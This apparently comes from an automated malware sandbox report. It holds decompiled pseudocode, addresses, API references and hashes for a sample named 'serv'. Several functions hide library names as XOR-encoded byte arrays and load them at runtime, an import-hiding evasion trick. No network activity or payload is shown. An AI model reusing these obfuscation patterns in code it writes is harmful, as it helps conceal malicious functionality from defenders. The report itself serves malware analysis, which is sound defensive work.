                                                                    0x0041e68c
                                                                    0x0041e68d
                                                                    0x0041e697
                                                                    0x0041e69f
                                                                    0x0041e6a4
                                                                    0x0041e6a6
                                                                    0x0041e6ad
                                                                    0x00000000
                                                                    0x0041e6b1
                                                                    0x0041e6ad
                                                                    0x0041e6a4
                                                                    0x0041e6b9

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(775C0001), ref: 0041E640
                                                                    • GetProcAddress.KERNEL32(775C0000,00000001), ref: 0041E697
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: '$8$H$J$K$L$Q$V$^$y
                                                                    • API String ID: 2574300362-2015752909
                                                                    • Opcode ID: 07eae468bfb3f3be1d59a2d399bf422476f3f657f132c18713f802f5554b2beb
                                                                    • Instruction ID: 3d344977766e9e3632f439ecadd653b0d9af4f9dc5cd0bf782aa0cdbf1fa7b1d
                                                                    • Opcode Fuzzy Hash: 07eae468bfb3f3be1d59a2d399bf422476f3f657f132c18713f802f5554b2beb
                                                                    • Instruction Fuzzy Hash: 0121196410C7C09DE306D729D94875BBED15B62308F88C8ADE5DD8A292D7BE8849C72B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00561A0E(CHAR* _a4) {
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				char _v20;
                                                                    				_Unknown_base(*)()* _t20;
                                                                    				void* _t23;
                                                                    				struct HINSTANCE__* _t25;
                                                                    				_Unknown_base(*)()* _t28;
                                                                    				void* _t30;
                                                                    
                                                                    				if( *0x563254 != 0) {
                                                                    					L6:
                                                                    					_t20 = GetProcAddress( *0x563254, _a4);
                                                                    					_t28 = _t20;
                                                                    					if(_t28 == 0 &&  *0x563248 != _t20) {
                                                                    						E00561AAA(1);
                                                                    					}
                                                                    					return _t28;
                                                                    				}
                                                                    				_v20 = 0x4d;
                                                                    				_v19 = 0x43;
                                                                    				_v18 = 0x54;
                                                                    				_v17 = 0x48;
                                                                    				_v16 = 0x43;
                                                                    				_v15 = 0x4a;
                                                                    				_v14 = 0x15;
                                                                    				_v13 = 0x14;
                                                                    				_v12 = 8;
                                                                    				_v11 = 0x42;
                                                                    				_v10 = 0x4a;
                                                                    				_v9 = 0x4a;
                                                                    				_v8 = 0x26;
                                                                    				_t23 = 0;
                                                                    				do {
                                                                    					 *(_t30 + _t23 - 0x10) =  *(_t30 + _t23 - 0x10) ^ 0x00000026;
                                                                    					_t23 = _t23 + 1;
                                                                    				} while (_t23 < 0xd);
                                                                    				_t25 = LoadLibraryA( &_v20);
                                                                    				 *0x563254 = _t25;
                                                                    				if(_t25 == 0 &&  *0x563248 != _t25) {
                                                                    					E00561AAA(1);
                                                                    				}
                                                                    				goto L6;
                                                                    			}





















                                                                    0x00561a1b
                                                                    0x00561a80
                                                                    0x00561a8a
                                                                    0x00561a90
                                                                    0x00561a94
                                                                    0x00561aa0
                                                                    0x00561aa0
                                                                    0x00561aa9
                                                                    0x00561aa9
                                                                    0x00561a1d
                                                                    0x00561a21
                                                                    0x00561a25
                                                                    0x00561a29
                                                                    0x00561a2d
                                                                    0x00561a31
                                                                    0x00561a35
                                                                    0x00561a39
                                                                    0x00561a3d
                                                                    0x00561a41
                                                                    0x00561a45
                                                                    0x00561a49
                                                                    0x00561a4d
                                                                    0x00561a51
                                                                    0x00561a53
                                                                    0x00561a53
                                                                    0x00561a58
                                                                    0x00561a59
                                                                    0x00561a62
                                                                    0x00561a6a
                                                                    0x00561a6f
                                                                    0x00561a7b
                                                                    0x00561a7b
                                                                    0x00000000

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(00000026), ref: 00561A62
                                                                    • GetProcAddress.KERNEL32(00561D0C), ref: 00561A8A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614225956.0000000000561000.00000020.00000001.01000000.00000008.sdmp, Offset: 00560000, based on PE: true
                                                                    • Associated: 00000002.00000002.614209974.0000000000560000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614242281.0000000000563000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614256717.0000000000564000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_560000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: &$&$B$C$C$H$J$J$J$T
                                                                    • API String ID: 2574300362-1614688679
                                                                    • Opcode ID: e199ac3333d38fbb34c50487bf7926b2fc8f9b8ecd6ac1353a9a801836eb861a
                                                                    • Instruction ID: d3706cf235fc4aa5dbc4594c33993d58ecac365053628709996c1d16836d0589
                                                                    • Opcode Fuzzy Hash: e199ac3333d38fbb34c50487bf7926b2fc8f9b8ecd6ac1353a9a801836eb861a
                                                                    • Instruction Fuzzy Hash: 05114920D056C5EDDF11D7FCC81C39DBFA16B61355F088098D144A7192D7FA4748D7AA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041C580(CHAR* _a4) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				signed int _v20;
                                                                    				signed char _v21;
                                                                    				signed int _t37;
                                                                    				signed int _t39;
                                                                    				signed char _t41;
                                                                    				intOrPtr _t45;
                                                                    				void* _t49;
                                                                    				intOrPtr _t56;
                                                                    				signed char _t60;
                                                                    				signed char _t61;
                                                                    				signed int _t63;
                                                                    				signed char _t64;
                                                                    				struct HINSTANCE__* _t67;
                                                                    				signed char _t71;
                                                                    				void* _t75;
                                                                    				_Unknown_base(*)()* _t76;
                                                                    				void* _t77;
                                                                    
                                                                    				_t63 =  *0x447d6c; // 0x0
                                                                    				_t37 = _t63;
                                                                    				_v20 = _t37 * 0x5a >> 0x20;
                                                                    				_v21 = _t37 * 0x5a;
                                                                    				_t39 = _v20;
                                                                    				_t71 = _t39 * 0x67 >> 0x20;
                                                                    				_t64 = _t63 - _t39 * 0x67;
                                                                    				_t41 = _v21;
                                                                    				_t75 = 0x27;
                                                                    				do {
                                                                    					_t71 = _t71 - _t41;
                                                                    					_t75 = _t75 - 1;
                                                                    				} while (_t75 != 0);
                                                                    				_t60 = _t64 ^ _t71 | 0x0000004f;
                                                                    				_t67 =  *0x447d84; // 0x76b10000
                                                                    				if(_t67 != 0) {
                                                                    					L8:
                                                                    					_t76 = GetProcAddress(_t67, _a4);
                                                                    					if(_t76 == 0) {
                                                                    						_t45 =  *0x447d7c; // 0x1
                                                                    						if(_t45 != 0) {
                                                                    							E0041A720(1);
                                                                    						}
                                                                    					}
                                                                    					return _t76;
                                                                    				} else {
                                                                    					_v15 = 0x25;
                                                                    					_v7 = 0x25;
                                                                    					_v6 = 0x2d;
                                                                    					_v5 = 0x2d;
                                                                    					_v16 = 0x20;
                                                                    					_v14 = 0x37;
                                                                    					_v13 = 0x20;
                                                                    					_v12 = 0x31;
                                                                    					_v11 = 0x28;
                                                                    					_v10 = 0x72;
                                                                    					_v9 = 0x73;
                                                                    					_v8 = 0x6f;
                                                                    					_v4 = 0x41;
                                                                    					_t49 = 0;
                                                                    					goto L4;
                                                                    					L4:
                                                                    					 *(_t77 + _t49 + 0x10) =  *(_t77 + _t49 + 0x10) ^ 0x00000041;
                                                                    					_t49 = _t49 + 1;
                                                                    					if(_t49 < 0xd) {
                                                                    						goto L4;
                                                                    					} else {
                                                                    						_t67 = LoadLibraryA( &_v16);
                                                                    						_t61 = _t60 + (_t60 - 0x00000027 ^ 0x000000e9) * 0x2c;
                                                                    						 *0x447d84 = _t67;
                                                                    						if(_t67 == 0) {
                                                                    							_t56 =  *0x447d7c; // 0x1
                                                                    							_v21 = _t61 << 6;
                                                                    							if(_t56 != 0) {
                                                                    								E0041A720(1);
                                                                    								_t67 =  *0x447d84; // 0x76b10000
                                                                    							}
                                                                    						}
                                                                    						goto L8;
                                                                    					}
                                                                    				}
                                                                    			}

































                                                                    0x0041c583
                                                                    0x0041c590
                                                                    0x0041c59b
                                                                    0x0041c59f
                                                                    0x0041c5a3
                                                                    0x0041c5a9
                                                                    0x0041c5ab
                                                                    0x0041c5ad
                                                                    0x0041c5b1
                                                                    0x0041c5b6
                                                                    0x0041c5b6
                                                                    0x0041c5b8
                                                                    0x0041c5b8
                                                                    0x0041c5c0
                                                                    0x0041c5c2
                                                                    0x0041c5ca
                                                                    0x0041c65f
                                                                    0x0041c66b
                                                                    0x0041c66f
                                                                    0x0041c671
                                                                    0x0041c678
                                                                    0x0041c67c
                                                                    0x0041c67c
                                                                    0x0041c678
                                                                    0x0041c688
                                                                    0x0041c5d0
                                                                    0x0041c5d2
                                                                    0x0041c5d6
                                                                    0x0041c5de
                                                                    0x0041c5e2
                                                                    0x0041c5e6
                                                                    0x0041c5ea
                                                                    0x0041c5ef
                                                                    0x0041c5f3
                                                                    0x0041c5f8
                                                                    0x0041c5fd
                                                                    0x0041c602
                                                                    0x0041c607
                                                                    0x0041c60c
                                                                    0x0041c611
                                                                    0x0041c611
                                                                    0x0041c613
                                                                    0x0041c613
                                                                    0x0041c618
                                                                    0x0041c61c
                                                                    0x00000000
                                                                    0x0041c61e
                                                                    0x0041c629
                                                                    0x0041c636
                                                                    0x0041c63a
                                                                    0x0041c640
                                                                    0x0041c642
                                                                    0x0041c64c
                                                                    0x0041c650
                                                                    0x0041c654
                                                                    0x0041c659
                                                                    0x0041c659
                                                                    0x0041c650
                                                                    0x00000000
                                                                    0x0041c640
                                                                    0x0041c61c

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(00000041), ref: 0041C623
                                                                    • GetProcAddress.KERNEL32(76B10000,?), ref: 0041C665
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: ($1$7$A$A$o$r$s
                                                                    • API String ID: 2574300362-1398786251
                                                                    • Opcode ID: 1bd7b995730252d2abdc7e9f40050a13eb4ec7b8990fffbe5426ee7a2b0170cf
                                                                    • Instruction ID: 9168922cf028962762e7c3630e87cec27554926b78189a3a967d1e55294b1143
                                                                    • Opcode Fuzzy Hash: 1bd7b995730252d2abdc7e9f40050a13eb4ec7b8990fffbe5426ee7a2b0170cf
                                                                    • Instruction Fuzzy Hash: FC31A12554D3818ED306DF38A8906EBBFE55B66344F04689EE4D487353C268C68DC7E7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00561E4A(CHAR* _a4) {
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				_Unknown_base(*)()* _t18;
                                                                    				void* _t21;
                                                                    				struct HINSTANCE__* _t23;
                                                                    				_Unknown_base(*)()* _t26;
                                                                    				void* _t28;
                                                                    
                                                                    				if( *0x56324c != 0) {
                                                                    					L6:
                                                                    					_t18 = GetProcAddress( *0x56324c, _a4);
                                                                    					_t26 = _t18;
                                                                    					if(_t26 == 0 &&  *0x563248 != _t18) {
                                                                    						E00561AAA(1);
                                                                    					}
                                                                    					return _t26;
                                                                    				}
                                                                    				_v16 = 0x56;
                                                                    				_v15 = 0x50;
                                                                    				_v14 = 0x46;
                                                                    				_v13 = 0x51;
                                                                    				_v12 = 0x10;
                                                                    				_v11 = 0x11;
                                                                    				_v10 = 0xd;
                                                                    				_v9 = 0x47;
                                                                    				_v8 = 0x4f;
                                                                    				_v7 = 0x4f;
                                                                    				_v6 = 0x23;
                                                                    				_t21 = 0;
                                                                    				do {
                                                                    					 *(_t28 + _t21 - 0xc) =  *(_t28 + _t21 - 0xc) ^ 0x00000023;
                                                                    					_t21 = _t21 + 1;
                                                                    				} while (_t21 < 0xb);
                                                                    				_t23 = LoadLibraryA( &_v16);
                                                                    				 *0x56324c = _t23;
                                                                    				if(_t23 == 0 &&  *0x563248 != _t23) {
                                                                    					E00561AAA(1);
                                                                    				}
                                                                    				goto L6;
                                                                    			}



















                                                                    0x00561e57
                                                                    0x00561eb4
                                                                    0x00561ebe
                                                                    0x00561ec4
                                                                    0x00561ec8
                                                                    0x00561ed4
                                                                    0x00561ed4
                                                                    0x00561edd
                                                                    0x00561edd
                                                                    0x00561e59
                                                                    0x00561e5d
                                                                    0x00561e61
                                                                    0x00561e65
                                                                    0x00561e69
                                                                    0x00561e6d
                                                                    0x00561e71
                                                                    0x00561e75
                                                                    0x00561e79
                                                                    0x00561e7d
                                                                    0x00561e81
                                                                    0x00561e85
                                                                    0x00561e87
                                                                    0x00561e87
                                                                    0x00561e8c
                                                                    0x00561e8d
                                                                    0x00561e96
                                                                    0x00561e9e
                                                                    0x00561ea3
                                                                    0x00561eaf
                                                                    0x00561eaf
                                                                    0x00000000

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(00000023), ref: 00561E96
                                                                    • GetProcAddress.KERNEL32(?), ref: 00561EBE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614225956.0000000000561000.00000020.00000001.01000000.00000008.sdmp, Offset: 00560000, based on PE: true
                                                                    • Associated: 00000002.00000002.614209974.0000000000560000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614242281.0000000000563000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614256717.0000000000564000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_560000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: #$#$F$G$O$O$P$Q
                                                                    • API String ID: 2574300362-1779502638
                                                                    • Opcode ID: 002e4d16369760286387a560cafde5f2857e89937c79a6939760fe3cf0a1be9c
                                                                    • Instruction ID: a1623341844ef667ab2ecb3c39c384f9b46337e015e80f8999fbbda65036b54e
                                                                    • Opcode Fuzzy Hash: 002e4d16369760286387a560cafde5f2857e89937c79a6939760fe3cf0a1be9c
                                                                    • Instruction Fuzzy Hash: 19110630D046C8BEDF1197BCC81C3DD7FA4AB21749F088194D844A7292D3FA8A4CCBA6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 75%
                                                                    			E0042933F(void* __ebx, void* __edi, int __esi, void* __eflags) {
                                                                    				signed int _t119;
                                                                    				intOrPtr _t120;
                                                                    				int _t122;
                                                                    				char* _t125;
                                                                    				int _t132;
                                                                    				signed int _t134;
                                                                    				int _t137;
                                                                    				int _t138;
                                                                    				short* _t160;
                                                                    				short* _t163;
                                                                    				int _t164;
                                                                    				signed int _t165;
                                                                    				long _t169;
                                                                    				signed int _t172;
                                                                    				int _t181;
                                                                    				char* _t183;
                                                                    				int _t184;
                                                                    				signed int _t186;
                                                                    				int _t187;
                                                                    				int _t190;
                                                                    				void* _t192;
                                                                    				short* _t193;
                                                                    				char* _t195;
                                                                    				char* _t196;
                                                                    				signed int _t199;
                                                                    
                                                                    				_t185 = __esi;
                                                                    				_push(0x38);
                                                                    				_push(0x4312f0);
                                                                    				E0042422C(__ebx, __edi, __esi);
                                                                    				_t199 =  *0x4484b4; // 0x1
                                                                    				if(_t199 == 0) {
                                                                    					_t185 = 1;
                                                                    					if(LCMapStringW(0, 0x100, 0x430bb4, 1, 0, 0) == 0) {
                                                                    						_t169 = GetLastError();
                                                                    						__eflags = _t169 - 0x78;
                                                                    						if(_t169 == 0x78) {
                                                                    							 *0x4484b4 = 2;
                                                                    						}
                                                                    					} else {
                                                                    						 *0x4484b4 = 1;
                                                                    					}
                                                                    				}
                                                                    				if( *(_t192 + 0x14) <= 0) {
                                                                    					L11:
                                                                    					_t119 =  *0x4484b4; // 0x1
                                                                    					if(_t119 == 2 || _t119 == 0) {
                                                                    						 *(_t192 - 0x28) = 0;
                                                                    						_t183 = 0;
                                                                    						 *(_t192 - 0x3c) = 0;
                                                                    						__eflags =  *(_t192 + 8);
                                                                    						if( *(_t192 + 8) == 0) {
                                                                    							_t138 =  *0x448460; // 0x0
                                                                    							 *(_t192 + 8) = _t138;
                                                                    						}
                                                                    						__eflags =  *(_t192 + 0x20);
                                                                    						if( *(_t192 + 0x20) == 0) {
                                                                    							_t137 =  *0x448470; // 0x0
                                                                    							 *(_t192 + 0x20) = _t137;
                                                                    						}
                                                                    						_t120 = E004298A2( *(_t192 + 8));
                                                                    						 *((intOrPtr*)(_t192 - 0x40)) = _t120;
                                                                    						__eflags = _t120 - 0xffffffff;
                                                                    						if(_t120 != 0xffffffff) {
                                                                    							__eflags = _t120 -  *(_t192 + 0x20);
                                                                    							if(__eflags == 0) {
                                                                    								_t186 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 + 0x18),  *(_t192 + 0x1c));
                                                                    								L61:
                                                                    								__eflags =  *(_t192 - 0x28);
                                                                    								if(__eflags != 0) {
                                                                    									_push( *(_t192 - 0x28));
                                                                    									E0042275E(0, _t183, _t186, __eflags);
                                                                    								}
                                                                    								_t122 = _t186;
                                                                    								goto L64;
                                                                    							}
                                                                    							_push(0);
                                                                    							_push(0);
                                                                    							_t175 = _t192 + 0x14;
                                                                    							_push(_t192 + 0x14);
                                                                    							_push( *(_t192 + 0x10));
                                                                    							_push(_t120);
                                                                    							_push( *(_t192 + 0x20));
                                                                    							_t125 = E004298E5(0, _t183, _t185, __eflags);
                                                                    							_t195 =  &(_t193[0xc]);
                                                                    							 *(_t192 - 0x28) = _t125;
                                                                    							__eflags = _t125;
                                                                    							if(_t125 == 0) {
                                                                    								goto L46;
                                                                    							}
                                                                    							_t187 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc), _t125,  *(_t192 + 0x14), 0, 0);
                                                                    							 *(_t192 - 0x24) = _t187;
                                                                    							__eflags = _t187;
                                                                    							if(_t187 == 0) {
                                                                    								_t186 =  *(_t192 - 0x48);
                                                                    								L58:
                                                                    								__eflags =  *(_t192 - 0x3c);
                                                                    								if(__eflags != 0) {
                                                                    									_push(_t183);
                                                                    									E0042275E(0, _t183, _t186, __eflags);
                                                                    								}
                                                                    								goto L61;
                                                                    							}
                                                                    							 *(_t192 - 4) = 0;
                                                                    							E00422920(_t126 + 0x00000003 & 0xfffffffc, _t175);
                                                                    							 *(_t192 - 0x18) = _t195;
                                                                    							_t183 = _t195;
                                                                    							 *(_t192 - 0x44) = _t183;
                                                                    							E004282F0(_t183, 0, _t187);
                                                                    							_t196 =  &(_t195[0xc]);
                                                                    							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
                                                                    							__eflags = _t183;
                                                                    							if(_t183 != 0) {
                                                                    								L54:
                                                                    								_t132 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x28),  *(_t192 + 0x14), _t183,  *(_t192 - 0x24));
                                                                    								 *(_t192 - 0x24) = _t132;
                                                                    								__eflags = _t132;
                                                                    								if(__eflags != 0) {
                                                                    									_push( *(_t192 + 0x1c));
                                                                    									_push( *(_t192 + 0x18));
                                                                    									_push(_t192 - 0x24);
                                                                    									_push(_t183);
                                                                    									_push( *(_t192 + 0x20));
                                                                    									_push( *((intOrPtr*)(_t192 - 0x40)));
                                                                    									_t134 = E004298E5(0, _t183, _t187, __eflags);
                                                                    									asm("sbb esi, esi");
                                                                    									_t186 =  ~( ~_t134);
                                                                    									goto L58;
                                                                    								}
                                                                    								goto L55;
                                                                    							} else {
                                                                    								_t183 = E00422EEB( *(_t192 - 0x24));
                                                                    								__eflags = _t183;
                                                                    								if(_t183 == 0) {
                                                                    									L55:
                                                                    									_t186 = 0;
                                                                    									goto L58;
                                                                    								}
                                                                    								E004282F0(_t183, 0,  *(_t192 - 0x24));
                                                                    								_t196 =  &(_t196[0xc]);
                                                                    								 *(_t192 - 0x3c) = 1;
                                                                    								goto L54;
                                                                    							}
                                                                    						} else {
                                                                    							goto L46;
                                                                    						}
                                                                    					} else {
                                                                    						if(_t119 != 1) {
                                                                    							L46:
                                                                    							_t122 = 0;
                                                                    							L64:
                                                                    							return E00424267(_t122);
                                                                    						}
                                                                    						_t184 = 0;
                                                                    						 *(_t192 - 0x2c) = 0;
                                                                    						 *(_t192 - 0x38) = 0;
                                                                    						 *(_t192 - 0x34) = 0;
                                                                    						if( *(_t192 + 0x20) == 0) {
                                                                    							_t164 =  *0x448470; // 0x0
                                                                    							 *(_t192 + 0x20) = _t164;
                                                                    						}
                                                                    						_t190 = MultiByteToWideChar( *(_t192 + 0x20), 1 + (0 |  *((intOrPtr*)(_t192 + 0x24)) != 0x00000000) * 8,  *(_t192 + 0x10),  *(_t192 + 0x14), 0, 0);
                                                                    						 *(_t192 - 0x30) = _t190;
                                                                    						if(_t190 == 0) {
                                                                    							goto L46;
                                                                    						} else {
                                                                    							 *(_t192 - 4) = 1;
                                                                    							E00422920(_t190 + _t190 + 0x00000003 & 0xfffffffc, _t172);
                                                                    							 *(_t192 - 0x18) = _t193;
                                                                    							 *(_t192 - 0x1c) = _t193;
                                                                    							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
                                                                    							if( *(_t192 - 0x1c) != 0) {
                                                                    								L21:
                                                                    								if(MultiByteToWideChar( *(_t192 + 0x20), 1,  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 - 0x1c), _t190) == 0) {
                                                                    									L36:
                                                                    									_t219 =  *(_t192 - 0x34);
                                                                    									if( *(_t192 - 0x34) != 0) {
                                                                    										_push( *(_t192 - 0x20));
                                                                    										E0042275E(0, _t184, _t190, _t219);
                                                                    									}
                                                                    									_t220 =  *(_t192 - 0x38);
                                                                    									if( *(_t192 - 0x38) != 0) {
                                                                    										_push( *(_t192 - 0x1c));
                                                                    										E0042275E(0, _t184, _t190, _t220);
                                                                    									}
                                                                    									_t122 = _t184;
                                                                    									goto L64;
                                                                    								}
                                                                    								_t184 = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190, 0, 0);
                                                                    								 *(_t192 - 0x2c) = _t184;
                                                                    								if(_t184 == 0) {
                                                                    									goto L36;
                                                                    								}
                                                                    								if(( *(_t192 + 0xd) & 0x00000004) == 0) {
                                                                    									 *(_t192 - 4) = 2;
                                                                    									E00422920(_t184 + _t184 + 0x00000003 & 0xfffffffc, _t172);
                                                                    									 *(_t192 - 0x18) = _t193;
                                                                    									 *(_t192 - 0x20) = _t193;
                                                                    									 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
                                                                    									__eflags =  *(_t192 - 0x20);
                                                                    									if( *(_t192 - 0x20) != 0) {
                                                                    										L31:
                                                                    										__eflags = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 - 0x20), _t184);
                                                                    										if(__eflags != 0) {
                                                                    											_push(0);
                                                                    											_push(0);
                                                                    											__eflags =  *(_t192 + 0x1c);
                                                                    											if(__eflags != 0) {
                                                                    												_push( *(_t192 + 0x1c));
                                                                    												_push( *(_t192 + 0x18));
                                                                    											} else {
                                                                    												_push(0);
                                                                    												_push(0);
                                                                    											}
                                                                    											_t184 = WideCharToMultiByte( *(_t192 + 0x20), 0,  *(_t192 - 0x20), _t184, ??, ??, ??, ??);
                                                                    										}
                                                                    										goto L36;
                                                                    									} else {
                                                                    										_t160 = E00422EEB(_t184 + _t184);
                                                                    										 *(_t192 - 0x20) = _t160;
                                                                    										__eflags = _t160;
                                                                    										if(__eflags == 0) {
                                                                    											goto L36;
                                                                    										}
                                                                    										 *(_t192 - 0x34) = 1;
                                                                    										goto L31;
                                                                    									}
                                                                    								}
                                                                    								if( *(_t192 + 0x1c) != 0 && _t184 <=  *(_t192 + 0x1c)) {
                                                                    									LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 + 0x18),  *(_t192 + 0x1c));
                                                                    								}
                                                                    								goto L36;
                                                                    							} else {
                                                                    								_t163 = E00422EEB(_t190 + _t190);
                                                                    								_pop(_t172);
                                                                    								 *(_t192 - 0x1c) = _t163;
                                                                    								if(_t163 == 0) {
                                                                    									goto L46;
                                                                    								}
                                                                    								 *(_t192 - 0x38) = 1;
                                                                    								goto L21;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				_t181 =  *(_t192 + 0x14);
                                                                    				_t165 =  *(_t192 + 0x10);
                                                                    				while(1) {
                                                                    					_t172 = _t181 - 1;
                                                                    					if( *_t165 == 0) {
                                                                    						break;
                                                                    					}
                                                                    					_t165 = _t165 + 1;
                                                                    					if(_t172 != 0) {
                                                                    						continue;
                                                                    					}
                                                                    					_t172 = _t172 | 0xffffffff;
                                                                    					break;
                                                                    				}
                                                                    				 *(_t192 + 0x14) =  *(_t192 + 0x14) + (_t165 | 0xffffffff) - _t172;
                                                                    				goto L11;
                                                                    			}




























                                                                    0x0042933f
                                                                    0x0042933f
                                                                    0x00429341
                                                                    0x00429346
                                                                    0x0042934d
                                                                    0x00429353
                                                                    0x00429359
                                                                    0x0042936e
                                                                    0x00429378
                                                                    0x0042937e
                                                                    0x00429381
                                                                    0x00429383
                                                                    0x00429383
                                                                    0x00429370
                                                                    0x00429370
                                                                    0x00429370
                                                                    0x0042936e
                                                                    0x00429390
                                                                    0x004293ad
                                                                    0x004293ad
                                                                    0x004293b5
                                                                    0x00429597
                                                                    0x0042959a
                                                                    0x0042959c
                                                                    0x0042959f
                                                                    0x004295a2
                                                                    0x004295a4
                                                                    0x004295a9
                                                                    0x004295a9
                                                                    0x004295ac
                                                                    0x004295af
                                                                    0x004295b1
                                                                    0x004295b6
                                                                    0x004295b6
                                                                    0x004295bc
                                                                    0x004295c2
                                                                    0x004295c5
                                                                    0x004295c8
                                                                    0x004295d1
                                                                    0x004295d4
                                                                    0x004296e0
                                                                    0x004296e2
                                                                    0x004296e2
                                                                    0x004296e5
                                                                    0x004296e7
                                                                    0x004296ea
                                                                    0x004296ef
                                                                    0x004296f0
                                                                    0x00000000
                                                                    0x004296f0
                                                                    0x004295da
                                                                    0x004295db
                                                                    0x004295dc
                                                                    0x004295df
                                                                    0x004295e0
                                                                    0x004295e3
                                                                    0x004295e4
                                                                    0x004295e7
                                                                    0x004295ec
                                                                    0x004295ef
                                                                    0x004295f2
                                                                    0x004295f4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00429608
                                                                    0x0042960a
                                                                    0x0042960d
                                                                    0x0042960f
                                                                    0x004296b7
                                                                    0x004296ba
                                                                    0x004296ba
                                                                    0x004296bd
                                                                    0x004296bf
                                                                    0x004296c0
                                                                    0x004296c5
                                                                    0x00000000
                                                                    0x004296bd
                                                                    0x00429615
                                                                    0x0042961e
                                                                    0x00429623
                                                                    0x00429626
                                                                    0x00429628
                                                                    0x0042962e
                                                                    0x00429633
                                                                    0x00429648
                                                                    0x0042964c
                                                                    0x0042964e
                                                                    0x00429673
                                                                    0x00429683
                                                                    0x00429689
